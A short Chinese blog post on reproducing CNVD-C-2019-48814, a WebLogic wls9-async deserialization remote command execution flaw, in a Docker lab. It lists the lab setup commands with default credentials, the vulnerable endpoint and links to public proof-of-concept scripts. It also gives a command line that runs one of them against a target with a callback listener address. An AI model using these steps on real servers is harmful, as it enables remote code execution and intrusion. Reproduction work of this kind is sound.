CNVD-C-2019-48814 复现
CNVD-C-2019-48814
WebLogic wls9-async反序列化远程命令执行漏洞
Docker 搭建环境
docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest http://localhost:49163/console User: weblogic Pass: welcome1
http://xx.xx.xx.xxx:49163/_async/AsyncResponseService
poc 脚本
https://github.com/fuhei/CNVD-C-2019-48814/blob/master/CNVD-C-2019-48814.py
执行:
python2 C:\Users\ben\Desktop\扫描\4884\poc.py -l xxx.xxx.xx.125 -p 4848 -r http://xxx.xx.xxx.xx:49163
另外无回显的方式,可以用少宇师傅的如下:
https://github.com/jas502n/CNVD-C-2019-48814
还有另外一种方式
https://github.com/greekn/CNVD-C-2019-48814
一条评论
添加新评论
- Pingback: CNVD | 大专栏